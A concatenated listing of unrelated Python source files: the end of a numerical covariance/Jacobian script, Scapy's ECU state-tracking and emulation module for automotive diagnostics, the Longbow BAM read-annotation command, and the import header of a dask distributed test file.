pJ = Process(target=procJext, args=(XextList[i], Xint, Ns,
params, i, qJext[i]))
proJ.append(pJ)
if hessianos:
pH = Process(target=procHext, args=(XextList[i], Xint, Ns,
params, i, qHext[i]))
proH.append(pH)
pJ.start()  # start processes
if hessianos:
pH.start()
jInt = jInt.get()  # collect the results
if hessianos:
hInt = hInt.get()
for i in range(n):
jExt[i] = qJext[i].get()  # store results
if hessianos:
hExt[i] = qHext[i].get()
pJInt.join()  # wait for everything to finish
if hessianos:
pHInt.join()
[p.join() for p in proJ]
if hessianos:
[p.join() for p in proH]
if hessianos:
return jInt, hInt, jExt, hExt
else:
return jInt, jExt
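# Illustrative sketch (assumed names): a typical call to jacobianos() followed
# by a Newton-style update of the intrinsic parameters. `Xint0` and
# `XextList0` are hypothetical current estimates, and the step assumes jI and
# hI come back with shapes (Ns,) and (Ns, Ns).
#
# jI, hI, jE, hE = jacobianos(Xint0, Ns, XextList0, params, hessianos=True)
# deltaXint = -np.linalg.solve(hI, jI.reshape(-1))  # intrinsic step (sketch)
# Xint1 = Xint0 + deltaXint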
# %% variance of a covariance matrix estimated by Monte Carlo (MC)
#PvecA = np.array([[1,0,0,0],
# [0,0,1,0],
# [0,1,0,0],
# [0,0,0,1]])
#
#const = (PvecA + np.eye(4))
# I matrix + transposition permutation matrix
const2 = np.array([[2, 0, 0, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 0, 2]])
def varVar2(c, N):
'''
for a 2x2 c: calculates the 4x4 variance matrix assuming a Wishart
distribution
https://www.statlect.com/probability-distributions/wishart-distribution
'''
cKron = np.kron(c,c)
return const2.dot(cKron) / N
def varMahal(c1, n, c2, rank=False):
'''
calculates the Mahalanobis distance between two matrices, taking the first
one as the reference (order matters).
If rank is enabled, it also returns the accumulated probability up to that
Mahalanobis distance, assuming 3 degrees of freedom
'''
# drop the redundant row and column because they add no information
c1Var = varVar2(c1, n)[[0,1,3]].T[[0,1,3]].T
c1Pres = inv(c1Var) # precision matrix
c1flat = c1[[0,0,1],[0,1,1]]
c2flat = c2[[0,0,1],[0,1,1]]
cFlatDif = c1flat - c2flat
mahDist = cFlatDif.dot(c1Pres).dot(cFlatDif)
if rank:
ranking = chi2.cdf(mahDist, 3)
return mahDist, ranking
else:
return mahDist
def trasPerMAt(k,l):
'''
returns the transposition permutation matrix of a matrix A of size (k, l)
https://www.statlect.com/probability-distributions/wishart-distribution#refMuirhead
'''
n = k*l
vecA = np.arange(n, dtype=int)
A = vecA.reshape((k,l))
vecAT = A.T.reshape(-1)
mat = np.zeros((n,n), dtype=int)
mat[[vecA],[vecAT]] = 1
return mat
def varVarN(c, Nsamples):
'''
returns the variance of a covariance matrix of size NxN calculated with
Nsamples samples
'''
cKron = np.kron(c,c)
n = c.shape[0]
const = np.eye(n**2) + trasPerMAt(n, n)
return const.dot(cKron) / Nsamples
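# Minimal numeric sketch (illustrative only) of the Wishart-based variance
# formulas above; for a 2x2 covariance, varVar2 and the general varVarN
# should agree, and varMahal compares two covariances via that variance:
#
# c = np.array([[2.0, 0.3],
#               [0.3, 1.0]])   # covariance estimated from N = 500 samples
# v2 = varVar2(c, 500)         # 4x4 variance of vec(c), 2x2 shortcut
# vN = varVarN(c, 500)         # same quantity via the general formula
# np.allclose(v2, vN)          # expected to be True
# d, p = varMahal(c, 500, 1.1 * c, rank=True)  # distance and chi2 rank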
|
ecu.py
|
#! /usr/bin/env python
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Nils Weiss <nils@we155.de>
# This program is published under a GPLv2 license
# scapy.contrib.description = Helper class for tracking Ecu states (Ecu)
# scapy.contrib.status = loads
import time
import random
import copy
from collections import defaultdict
from types import GeneratorType
from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \
Tuple, Type, cast, Dict, orb
from scapy.packet import Raw, Packet
from scapy.plist import PacketList
from scapy.sessions import DefaultSession
from scapy.ansmachine import AnsweringMachine
from scapy.config import conf
from scapy.supersocket import SuperSocket
__all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession",
"EcuAnsweringMachine"]
class EcuState(object):
"""
Stores the state of an Ecu. The state is defined by a protocol, for
example UDS or GMLAN.
An EcuState supports comparison and serialization (command()).
"""
def __init__(self, **kwargs):
# type: (Any) -> None
for k, v in kwargs.items():
if isinstance(v, GeneratorType):
v = list(v)
self.__setattr__(k, v)
def __getitem__(self, item):
# type: (str) -> Any
return self.__dict__[item]
def __setitem__(self, key, value):
# type: (str, Any) -> None
self.__dict__[key] = value
def __repr__(self):
# type: () -> str
return "".join(str(k) + str(v) for k, v in
sorted(self.__dict__.items(), key=lambda t: t[0]))
def __eq__(self, other):
# type: (object) -> bool
other = cast(EcuState, other)
if len(self.__dict__) != len(other.__dict__):
return False
try:
return all(self.__dict__[k] == other.__dict__[k]
for k in self.__dict__.keys())
except KeyError:
return False
def __contains__(self, item):
# type: (EcuState) -> bool
if not isinstance(item, EcuState):
return False
if len(self.__dict__) != len(item.__dict__):
return False
try:
return all(ov == sv or (hasattr(sv, "__iter__") and ov in sv)
for sv, ov in
zip(self.__dict__.values(), item.__dict__.values()))
except (KeyError, TypeError):
return False
def __ne__(self, other):
# type: (object) -> bool
return not other == self
def __lt__(self, other):
# type: (EcuState) -> bool
if self == other:
return False
if len(self.__dict__.keys()) < len(other.__dict__.keys()):
return True
if len(self.__dict__.keys()) > len(other.__dict__.keys()):
return False
common = set(self.__dict__.keys()).intersection(
set(other.__dict__.keys()))
for k in sorted(common):
if not isinstance(other.__dict__[k], type(self.__dict__[k])):
raise TypeError(
"Can't compare %s with %s for the EcuState element %s" %
(type(self.__dict__[k]), type(other.__dict__[k]), k))
if self.__dict__[k] < other.__dict__[k]:
return True
if self.__dict__[k] > other.__dict__[k]:
return False
if len(common) < len(self.__dict__):
self_diffs = set(self.__dict__.keys()).difference(
set(other.__dict__.keys()))
other_diffs = set(other.__dict__.keys()).difference(
set(self.__dict__.keys()))
for s, o in zip(self_diffs, other_diffs):
if s < o:
return True
return False
raise TypeError("EcuStates should be identical. Something bad happened. "
"self: %s other: %s" % (self.__dict__, other.__dict__))
def __hash__(self):
# type: () -> int
return hash(repr(self))
def reset(self):
# type: () -> None
keys = list(self.__dict__.keys())
for k in keys:
del self.__dict__[k]
def command(self):
# type: () -> str
return "EcuState(" + ", ".join(
["%s=%s" % (k, repr(v)) for k, v in sorted(
self.__dict__.items(), key=lambda t: t[0])]) + ")"
@staticmethod
def extend_pkt_with_modifier(cls):
# type: (Type[Packet]) -> Callable[[Callable[[Packet, Packet, EcuState], None]], None] # noqa: E501
"""
Decorator to add a function as 'modify_ecu_state' method to a given
class. This allows dynamic modifications and additions to a protocol.
:param cls: A packet class to be modified
:return: Decorator function
"""
def decorator_function(f):
# type: (Callable[[Packet, Packet, EcuState], None]) -> None
setattr(cls, "modify_ecu_state", f)
return decorator_function
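    # Hedged usage sketch: registering a state modifier on a packet class.
    # `UDS_DSCPR` and its `diagnosticSessionType` field are assumed to come
    # from the UDS contrib module and are only used here for illustration.
    #
    # @EcuState.extend_pkt_with_modifier(UDS_DSCPR)
    # def _modify_session(response, request, state):
    #     # type: (Packet, Packet, EcuState) -> None
    #     state.session = response.diagnosticSessionType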
@staticmethod
def is_modifier_pkt(pkt):
# type: (Packet) -> bool
"""
Helper function to determine if a Packet contains a layer that
modifies the EcuState.
:param pkt: Packet to be analyzed
:return: True if pkt contains layer that implements modify_ecu_state
"""
return any(hasattr(layer, "modify_ecu_state")
for layer in pkt.layers())
@staticmethod
def get_modified_ecu_state(response, request, state, modify_in_place=False): # noqa: E501
# type: (Packet, Packet, EcuState, bool) -> EcuState
"""
Helper function to get a modified EcuState from a Packet and a
previous EcuState. An EcuState is always modified after a response
Packet is received. In some protocols, the belonging request packet
is necessary to determine the precise state of the Ecu
:param response: Response packet that supports `modify_ecu_state`
:param request: Belonging request of the response that modifies Ecu
:param state: The previous/current EcuState
:param modify_in_place: If True, the given EcuState will be modified
:return: The modified EcuState or a modified copy
"""
if modify_in_place:
new_state = state
else:
new_state = copy.copy(state)
for layer in response.layers():
if not hasattr(layer, "modify_ecu_state"):
continue
try:
layer.modify_ecu_state(response, request, new_state)
except TypeError:
layer.modify_ecu_state.im_func(response, request, new_state)
return new_state
class Ecu(object):
"""An Ecu object can be used to
* track the states of an Ecu.
* log all modifications to an Ecu.
* extract supported responses of a real Ecu.
Example:
>>> print("This ecu logs, tracks and creates supported responses")
>>> my_virtual_ecu = Ecu()
>>> my_virtual_ecu.update(PacketList([...]))
>>> my_virtual_ecu.supported_responses
>>> print("Another ecu just tracks")
>>> my_tracking_ecu = Ecu(logging=False, store_supported_responses=False)
>>> my_tracking_ecu.update(PacketList([...]))
>>> print("Another ecu just logs all modifications to it")
>>> my_logging_ecu = Ecu(verbose=False, store_supported_responses=False)
>>> my_logging_ecu.update(PacketList([...]))
>>> my_logging_ecu.log
>>> print("Another ecu just creates supported responses")
>>> my_response_ecu = Ecu(verbose=False, logging=False)
>>> my_response_ecu.update(PacketList([...]))
>>> my_response_ecu.supported_responses
Parameters to initialize an Ecu object
:param logging: Turn logging on or off. Default is on.
:param verbose: Turn tracking on or off. Default is on.
:param store_supported_responses: Create a list of supported responses if True.
:param lookahead: Configuration for lookahead when computing supported responses
""" # noqa: E501
def __init__(self, logging=True, verbose=True,
store_supported_responses=True, lookahead=10):
# type: (bool, bool, bool, int) -> None
self.state = EcuState()
self.verbose = verbose
self.logging = logging
self.store_supported_responses = store_supported_responses
self.lookahead = lookahead
self.log = defaultdict(list) # type: Dict[str, List[Any]]
self.__supported_responses = list() # type: List[EcuResponse]
self.__unanswered_packets = PacketList()
def reset(self):
# type: () -> None
"""
Resets the internal state to a default EcuState.
"""
self.state = EcuState(session=1)
def update(self, p):
# type: (Union[Packet, PacketList]) -> None
"""
Processes a Packet or a list of Packets, according to the chosen
configuration.
:param p: Packet or list of Packets
"""
if isinstance(p, PacketList):
for pkt in p:
self.update(pkt)
elif not isinstance(p, Packet):
raise TypeError("Provide a Packet object for an update")
else:
self.__update(p)
def __update(self, pkt):
# type: (Packet) -> None
"""
Processes a Packet according to the chosen configuration.
:param pkt: Packet to be processed
"""
if self.verbose:
print(repr(self), repr(pkt))
if self.logging:
self.__update_log(pkt)
self.__update_supported_responses(pkt)
def __update_log(self, pkt):
# type: (Packet) -> None
"""
Checks if a packet or a layer of this packet supports the function
`get_log`. If `get_log` is supported, this function will be executed
and the returned log information is stored in the internal log of this
Ecu object.
:param pkt: A Packet to be processed for log information.
"""
for layer in pkt.layers():
if not hasattr(layer, "get_log"):
continue
try:
log_key, log_value = layer.get_log(pkt)
except TypeError:
log_key, log_value = layer.get_log.im_func(pkt)
self.log[log_key].append((pkt.time, log_value))
def __update_supported_responses(self, pkt):
# type: (Packet) -> None
"""
Stores a given packet as a supported response if a matching request
packet is found in a list of the latest unanswered packets. For
performance improvements, this list of unanswered packets only contains
a fixed number of packets, defined by the `lookahead` parameter of
this Ecu.
:param pkt: Packet to be processed.
"""
self.__unanswered_packets.append(pkt)
reduced_plist = self.__unanswered_packets[-self.lookahead:]
answered, unanswered = reduced_plist.sr(lookahead=self.lookahead)
self.__unanswered_packets = unanswered
for req, resp in answered:
added = False
current_state = copy.copy(self.state)
EcuState.get_modified_ecu_state(resp, req, self.state, True)
if not self.store_supported_responses:
continue
for sup_resp in self.__supported_responses:
if resp == sup_resp.key_response:
if sup_resp.states is not None and \
self.state not in sup_resp.states:
sup_resp.states.append(current_state)
added = True
break
if added:
continue
ecu_resp = EcuResponse(current_state, responses=resp)
if self.verbose:
print("[+] ", repr(ecu_resp))
self.__supported_responses.append(ecu_resp)
@staticmethod
def sort_key_func(resp):
# type: (EcuResponse) -> Tuple[bool, int, int, int]
"""
This sorts responses in the following order:
1. Positive responses first
2. Lower ServiceIDs first
3. Less supported states first
4. Longer (more specific) responses first
:param resp: EcuResponse to be sorted
:return: Tuple as sort key
"""
first_layer = cast(Packet, resp.key_response[0]) # type: ignore
service = orb(bytes(first_layer)[0])
return (service == 0x7f,
service,
0xffffffff - len(resp.states or []),
0xffffffff - len(resp.key_response))
@property
def supported_responses(self):
# type: () -> List[EcuResponse]
"""
Returns a sorted list of supported responses. The sort is done in a way
to provide the best possible results, if this list of supported
responses is used to simulate a real-world Ecu with the
EcuAnsweringMachine object.
:return:
"""
self.__supported_responses.sort(key=self.sort_key_func)
return self.__supported_responses
@property
def unanswered_packets(self):
# type: () -> PacketList
"""
A list of all unanswered packets, which were processed by this Ecu
object.
:return: PacketList of unanswered packets
"""
return self.__unanswered_packets
def __repr__(self):
# type: () -> str
return repr(self.state)
@staticmethod
def extend_pkt_with_logging(cls):
# type: (Type[Packet]) -> Callable[[Callable[[Packet], Tuple[str, Any]]], None] # noqa: E501
"""
Decorator to add a function as 'get_log' method to a given
class. This allows dynamic modifications and additions to a protocol.
:param cls: A packet class to be modified
:return: Decorator function
"""
def decorator_function(f):
# type: (Callable[[Packet], Tuple[str, Any]]) -> None
setattr(cls, "get_log", f)
return decorator_function
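# Hedged usage sketch: attaching a logging hook to a packet class via
# Ecu.extend_pkt_with_logging. The layer name `UDS_DSCPR` and its
# `diagnosticSessionType` field are assumptions used only for illustration.
#
# @Ecu.extend_pkt_with_logging(UDS_DSCPR)
# def _log_session_change(pkt):
#     # type: (Packet) -> Tuple[str, Any]
#     return "session_change", pkt.diagnosticSessionType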
class EcuSession(DefaultSession):
"""
Tracks modifications to an Ecu object on the fly.
The parameters for the internal Ecu object are obtained from the kwargs
dict.
`logging`: Turn logging on or off. Default is on.
`verbose`: Turn tracking on or off. Default is on.
`store_supported_responses`: Create a list of supported responses, if True.
Example:
>>> sniff(session=EcuSession)
"""
def __init__(self, *args, **kwargs):
# type: (Any, Any) -> None
DefaultSession.__init__(self, *args, **kwargs)
self.ecu = Ecu(logging=kwargs.pop("logging", True),
verbose=kwargs.pop("verbose", True),
store_supported_responses=kwargs.pop("store_supported_responses", True)) # noqa: E501
def on_packet_received(self, pkt):
# type: (Optional[Packet]) -> None
if not pkt:
return
self.ecu.update(pkt)
DefaultSession.on_packet_received(self, pkt)
class EcuResponse:
"""Encapsulates responses and the according EcuStates.
A list of this objects can be used to configure an EcuAnsweringMachine.
This is useful, if you want to clone the behaviour of a real Ecu.
Example:
>>> EcuResponse(EcuState(session=2, security_level=2), responses=UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"deadbeef1"))
>>> EcuResponse([EcuState(session=range(2, 5), security_level=2), EcuState(session=3, security_level=5)], responses=UDS()/UDS_RDBIPR(dataIdentifier=9)/Raw(b"deadbeef4"))
Initialize an EcuResponse capsule
:param state: EcuState or list of EcuStates in which this response
is allowed to be sent. If no state is provided, the response
packet will always be sent.
:param responses: A Packet or a list of Packet objects. By default the
last packet is asked if it answers an incoming
packet. This allows sending, for example,
`requestCorrectlyReceived-ResponsePending` packets.
:param answers: Optional argument to provide a custom answer here:
`lambda resp, req: return resp.answers(req)`
This allows the modification of a response depending
on a request. Custom SecurityAccess mechanisms can
be implemented this way, and generic NegativeResponse
messages that answer everything can also be realized
this way.
""" # noqa: E501
def __init__(self, state=None, responses=Raw(b"\x7f\x10"), answers=None):
# type: (Optional[Union[EcuState, Iterable[EcuState]]], Union[Iterable[Packet], PacketList, Packet], Optional[Callable[[Packet, Packet], bool]]) -> None # noqa: E501
if state is None:
self.__states = None # type: Optional[List[EcuState]]
else:
if hasattr(state, "__iter__"):
state = cast(List[EcuState], state)
self.__states = state
else:
state = cast(EcuState, state)
self.__states = [state]
if isinstance(responses, PacketList):
self.__responses = responses # type: PacketList
elif isinstance(responses, Packet):
self.__responses = PacketList([responses])
elif hasattr(responses, "__iter__"):
responses = cast(List[Packet], responses)
self.__responses = PacketList(responses)
else:
raise TypeError(
"Can't handle type %s as response" % type(responses))
self.__custom_answers = answers
@property
def states(self):
# type: () -> Optional[List[EcuState]]
return self.__states
@property
def responses(self):
# type: () -> PacketList
return self.__responses
@property
def key_response(self):
# type: () -> Packet
pkt = self.__responses[-1] # type: Packet
return pkt
def supports_state(self, state):
# type: (EcuState) -> bool
if self.__states is None or len(self.__states) == 0:
return True
else:
return any(s == state or state in s for s in self.__states)
def answers(self, other):
# type: (Packet) -> Union[int, bool]
if self.__custom_answers is not None:
return self.__custom_answers(self.key_response, other)
else:
return self.key_response.answers(other)
def __repr__(self):
# type: () -> str
return "%s, responses=%s" % \
(repr(self.__states),
[resp.summary() for resp in self.__responses])
def __eq__(self, other):
# type: (object) -> bool
other = cast(EcuResponse, other)
responses_equal = \
len(self.responses) == len(other.responses) and \
all(bytes(x) == bytes(y) for x, y in zip(self.responses,
other.responses))
if self.__states is None:
return responses_equal
else:
return any(other.supports_state(s) for s in self.__states) and \
responses_equal
def __ne__(self, other):
# type: (object) -> bool
# Python 2.7 compat
return not self == other
def command(self):
# type: () -> str
if self.__states is not None:
return "EcuResponse(%s, responses=%s)" % (
"[" + ", ".join(s.command() for s in self.__states) + "]",
"[" + ", ".join(p.command() for p in self.__responses) + "]")
else:
return "EcuResponse(responses=%s)" % "[" + ", ".join(
p.command() for p in self.__responses) + "]"
__hash__ = None # type: ignore
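# Hedged sketch of the `answers` hook described in the EcuResponse docstring:
# a response that matches any request whose first byte is 0x22 (assumed UDS
# ReadDataByIdentifier service id), regardless of Packet.answers() logic.
#
# generic_rdbi_resp = EcuResponse(
#     responses=Raw(b"\x62\xf1\x90" + b"deadbeef"),
#     answers=lambda resp, req: orb(bytes(req)[0]) == 0x22)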
conf.contribs['EcuAnsweringMachine'] = {'send_delay': 0}
class EcuAnsweringMachine(AnsweringMachine):
"""AnsweringMachine which emulates the basic behaviour of a real world ECU.
Provide a list of ``EcuResponse`` objects to configure the behaviour of an
AnsweringMachine.
Usage:
>>> resp = EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))
>>> sock = ISOTPSocket(can_iface, sid=0x700, did=0x600, basecls=UDS)
>>> answering_machine = EcuAnsweringMachine(supported_responses=[resp], main_socket=sock, basecls=UDS)
>>> sim = threading.Thread(target=answering_machine, kwargs={'count': 4, 'timeout':5})
>>> sim.start()
""" # noqa: E501
function_name = "EcuAnsweringMachine"
sniff_options_list = ["store", "opened_socket", "count", "filter", "prn",
"stop_filter", "timeout"]
def parse_options(self, supported_responses=None,
main_socket=None, broadcast_socket=None, basecls=Raw,
timeout=None):
# type: (Optional[List[EcuResponse]], Optional[SuperSocket], Optional[SuperSocket], Type[Packet], Optional[Union[int, float]]) -> None # noqa: E501
"""
:param supported_responses: List of ``EcuResponse`` objects to define
the behaviour. The default response is
``generalReject``.
:param main_socket: Defines the object of the socket to send
and receive packets.
:param broadcast_socket: Defines the object of the broadcast socket.
Listen-only, responds with the main_socket.
`None` to disable broadcast capabilities.
:param basecls: Provide a basecls of the used protocol
:param timeout: Specifies the timeout for sniffing in seconds.
"""
self.__ecu_state = EcuState(session=1)
# TODO: Apply a cleanup of the initial EcuStates. Maybe provide a way
# to overwrite EcuState.reset to allow the manipulation of the
# initial (default) EcuState.
self.__main_socket = main_socket # type: Optional[SuperSocket]
self.__sockets = [self.__main_socket]
if broadcast_socket is not None:
self.__sockets.append(broadcast_socket)
self.__basecls = basecls # type: Type[Packet]
self.__supported_responses = supported_responses
self.sniff_options["timeout"] = timeout
self.sniff_options["opened_socket"] = self.__sockets
@property
def state(self):
# type: () -> EcuState
return self.__ecu_state
def is_request(self, req):
# type: (Packet) -> bool
return isinstance(req, self.__basecls)
def print_reply(self, req, reply):
# type: (Packet, PacketList) -> None
print("%s ==> %s" % (req.summary(), [res.summary() for res in reply]))
def make_reply(self, req):
# type: (Packet) -> PacketList
"""
Checks whether a given request can be answered by the internal list of
EcuResponses. First, it is evaluated whether the internal EcuState of this
AnsweringMachine is supported by an EcuResponse; next, whether
the key_response of that EcuResponse object answers the request. The
first fitting EcuResponse is used. If this EcuResponse modifies the
EcuState, the internal EcuState of this AnsweringMachine is updated,
and the list of response Packets of the selected EcuResponse is
returned. If no EcuResponse is found, a PacketList with a generic
NegativeResponse is returned.
:param req: A request packet
:return: A list of response packets
"""
if self.__supported_responses is not None:
for resp in self.__supported_responses:
if not isinstance(resp, EcuResponse):
raise TypeError("Unsupported type for response. "
"Please use `EcuResponse` objects.")
if not resp.supports_state(self.__ecu_state):
continue
if not resp.answers(req):
continue
EcuState.get_modified_ecu_state(
resp.key_response, req, self.__ecu_state, True)
return resp.responses
return PacketList([self.__basecls(
b"\x7f" + bytes(req)[0:1] + b"\x10")])
def send_reply(self, reply):
# type: (PacketList) -> None
"""
Sends all Packets of an EcuResponse object. This allows sending multiple
packets in response to a request. If the list contains more than one
packet, a random delay is inserted before each subsequent packet is
sent.
:param reply: List of packets to be sent.
"""
for p in reply:
time.sleep(conf.contribs['EcuAnsweringMachine']['send_delay'])
if len(reply) > 1:
time.sleep(random.uniform(0.01, 0.5))
if self.__main_socket:
self.__main_socket.send(p)
|
command.py
|
import logging
import math
import sys
import itertools
import re
import time
import os
import click
import click_log
import tqdm
import ssw
import pysam
import multiprocessing as mp
import gzip
from construct import *
from ..utils import bam_utils
from ..utils.bam_utils import SegmentInfo
from ..utils.model import LibraryModel
logging.basicConfig(stream=sys.stderr)
logger = logging.getLogger("annotate")
click_log.basic_config(logger)
@click.command(name=logger.name)
@click_log.simple_verbosity_option(logger)
@click.option(
"-p",
"--pbi",
required=False,
type=click.Path(),
help="BAM .pbi index file",
)
@click.option(
"-t",
"--threads",
type=int,
default=mp.cpu_count() - 1,
show_default=True,
help="number of threads to use (0 for all)",
)
@click.option(
"-o",
"--output-bam",
default="-",
type=click.Path(exists=False),
help="annotated bam output [default: stdout]",
)
@click.option(
"-m",
"--model",
type=str,
default="mas15",
show_default=True,
help="The model to use for annotation. If the given value is a pre-configured model name, then that "
"model will be used. Otherwise, the given value will be treated as a file name and Longbow will attempt to "
"read in the file and create a LibraryModel from it. Longbow will assume the contents are the configuration "
"of a LibraryModel as per LibraryModel.to_json()."
)
@click.option(
"-c",
"--chunk",
type=str,
default="",
required=False,
help="Process a single chunk of data (e.g. specify '2/4' to process the second of four equally-sized "
"chunks across the dataset)"
)
@click.option(
"--max-length",
type=int,
default=60000,
show_default=True,
required=False,
help="Maximum length of a read to process. Reads beyond this length will not be annotated."
)
@click.option(
"--min-rq",
type=float,
default=-2,
show_default=True,
required=False,
help="Minimum ccs-determined read quality for a read to be annotated. CCS read quality range is [-1,1]."
)
@click.argument("input-bam", default="-" if not sys.stdin.isatty() else None, type=click.File("rb"))
def main(pbi, threads, output_bam, model, chunk, max_length, min_rq, input_bam):
"""Annotate reads in a BAM file with segments from the model."""
t_start = time.time()
logger.info("Invoked via: longbow %s", " ".join(sys.argv[1:]))
threads = mp.cpu_count() if threads <= 0 or threads > mp.cpu_count() else threads
logger.info(f"Running with {threads} worker subprocess(es)")
# Get our model:
if LibraryModel.has_prebuilt_model(model):
logger.info(f"Using %s", LibraryModel.pre_configured_models[model]["description"])
m = LibraryModel.build_pre_configured_model(model)
else:
logger.info(f"Loading model from json file: %s", model)
m = LibraryModel.from_json_file(model)
pbi = f"{input_bam.name}.pbi" if pbi is None else pbi
read_count = None
start_offset = 0
end_offset = math.inf
if not os.path.exists(pbi) and chunk != "":
raise ValueError(f"Chunking specified but pbi file '{pbi}' not found")
if os.path.exists(pbi):
if chunk != "":
(chunk, num_chunks) = re.split("/", chunk)
chunk = int(chunk)
num_chunks = int(num_chunks)
# Decode PacBio .pbi file and determine the shard offsets.
offsets, zmw_counts, read_count, read_counts_per_chunk = bam_utils.compute_shard_offsets(pbi, num_chunks)
start_offset = offsets[chunk - 1]
end_offset = offsets[chunk] if chunk < len(offsets) else offsets[chunk - 1]
read_count = read_counts_per_chunk[chunk - 1] if chunk < len(offsets) else 0
logger.info("Annotating %d reads from chunk %d/%d", read_count, chunk, num_chunks)
else:
read_count = bam_utils.load_read_count(pbi)
logger.info("Annotating %d reads", read_count)
# Create queues for data:
queue_size = threads * 2 if threads < 10 else 20
manager = mp.Manager()
input_data_queue = manager.Queue(maxsize=queue_size)
results = manager.Queue()
# Start worker sub-processes:
worker_pool = []
for i in range(threads):
p = mp.Process(
target=_worker_segmentation_fn, args=(input_data_queue, results, i, m, max_length, min_rq)
)
p.start()
worker_pool.append(p)
pysam.set_verbosity(0) # silence message about the .bai file not being found
with pysam.AlignmentFile(
input_bam if start_offset == 0 else input_bam.name, "rb", check_sq=False, require_index=False
) as bam_file:
# If we're chunking, advance to the specified virtual file offset.
if start_offset > 0:
bam_file.seek(start_offset)
# Get our header from the input bam file:
out_header = bam_utils.create_bam_header_with_program_group(logger.name, bam_file.header, models=[m])
# Start output worker:
res = manager.dict({"num_reads_annotated": 0, "num_sections": 0})
output_worker = mp.Process(
target=_write_thread_fn,
args=(results, out_header, output_bam, not sys.stdin.isatty(), res, read_count, m)
)
output_worker.start()
# Add in a sentinel value at the end of the queue - one for each subprocess - so we guarantee
# that all subprocesses will exit:
iter_data = itertools.chain(bam_file, (None,) * threads)
for r in iter_data:
# We have to adjust for our sentinel value if we've got to it:
if r is not None:
r = r.to_string()
input_data_queue.put(r)
if start_offset > 0:
if bam_file.tell() >= end_offset or r is None:
[input_data_queue.put(None) for _ in range(threads)]
break
logger.debug("Finished reading data and sending it to sub-processes.")
logger.debug("Waiting for sub-processes to finish...")
# Wait for our input jobs to finish:
for p in worker_pool:
p.join()
logger.debug("All workers stopped.")
logger.debug("Terminating output process.")
# Now that our input processes are done, we can add our exit sentinel onto the output queue and
# wait for that process to end:
results.put(None)
output_worker.join()
logger.info(
f"Annotated {res['num_reads_annotated']} reads with {res['num_sections']} total sections."
)
et = time.time()
logger.info(f"Done. Elapsed time: {et - t_start:2.2f}s. "
f"Overall processing rate: {res['num_reads_annotated']/(et - t_start):2.2f} reads/s.")
def get_segments(read):
"""Get the segments corresponding to a particular read by reading the segments tag information."""
return read.to_string(), [
SegmentInfo.from_tag(s) for s in read.get_tag(bam_utils.SEGMENTS_TAG).split(bam_utils.SEGMENT_TAG_DELIMITER)
]
def _write_thread_fn(out_queue, out_bam_header, out_bam_file_name, disable_pbar, res, read_count, model):
"""Thread / process fn to write out all our data."""
with pysam.AlignmentFile(
out_bam_file_name, "wb", header=out_bam_header
) as out_bam_file, tqdm.tqdm(
desc="Progress",
unit=" read",
colour="green",
file=sys.stderr,
disable=disable_pbar,
total=read_count
) as pbar:
ssw_aligner = ssw.Aligner()
while True:
# Wait for some output data:
raw_data = out_queue.get()
# Check for exit sentinel:
if raw_data is None:
break
# Should really never be None, but just in case:
elif raw_data is None:
continue
# Unpack data:
read, ppath, logp, is_rc = raw_data
# Condense the output annotations so we can write them out with indices:
segments = bam_utils.collapse_annotations(ppath)
read = pysam.AlignedSegment.fromstring(read, out_bam_header)
# Obligatory log message:
logger.debug(
"Path for read %s (%2.2f)%s: %s",
read.query_name,
logp,
" (RC)" if is_rc else "",
segments,
)
# Write out our read:
bam_utils.write_annotated_read(read, segments, is_rc, logp, model, ssw_aligner, out_bam_file)
# Increment our counters:
res["num_reads_annotated"] += 1
res["num_sections"] += len(segments)
pbar.update(1)
def _worker_segmentation_fn(in_queue, out_queue, worker_num, model, max_length, min_rq):
"""Function to run in each subthread / subprocess.
Segments each read and places the segments in the output queue."""
num_reads_segmented = 0
while True:
# Wait until we get some data.
# Note: Because we have a sentinel value None inserted at the end of the input data for each
# subprocess, we don't have to add a timeout - we're guaranteed each process will always have
# at least one element.
raw_data = in_queue.get()
# Check for exit sentinel:
if raw_data is None:
break
# Should really never be None, but just in case:
elif raw_data is None:
continue
# Unpack our data here:
read = raw_data
read = pysam.AlignedSegment.fromstring(
read, pysam.AlignmentHeader.from_dict(dict())
)
# Check for max length and min quality:
if len(read.query_sequence) > max_length:
logger.warning(f"Read is longer than max length. "
f"Skipping: {read.query_name} ({len(read.query_sequence)} > {max_length})")
continue
elif read.get_tag("rq") < min_rq:
logger.warning(f"Read quality is below the minimum. "
f"Skipping: {read.query_name} ({read.get_tag('rq')} < {min_rq})")
continue
# Process and place our data on the output queue:
segment_info = _segment_read(read, model)
out_queue.put(segment_info)
num_reads_segmented += 1
logger.debug(f"Worker %d: Num reads segmented: %d", worker_num, num_reads_segmented)
def _segment_read(read, model):
is_rc = False
logp, ppath = model.annotate(read.query_sequence)
rc_logp, rc_ppath = model.annotate(bam_utils.reverse_complement(read.query_sequence))
if rc_logp > logp:
logp = rc_logp
ppath = rc_ppath
is_rc = True
logger.debug("Sequence scored better in RC: %s", read.query_name)
return read.to_string(), ppath, logp, is_rc
|
test_client.py
|
from __future__ import annotations
import asyncio
import functools
import gc
import inspect
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import types
import warnings
import weakref
import zipfile
from collections import deque
from collections.abc import Generator
from contextlib import contextmanager, suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
from typing import Any
import psutil
import pytest
import yaml
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import parse_timedelta, stringify, tmpfile
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
ensure_default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.objects import HasWhat, WhoHas
from distributed.scheduler import (
COMPILED,
CollectTaskMetaDataPlugin,
KilledWorker,
Scheduler,
)
from distributed.sizeof import sizeof
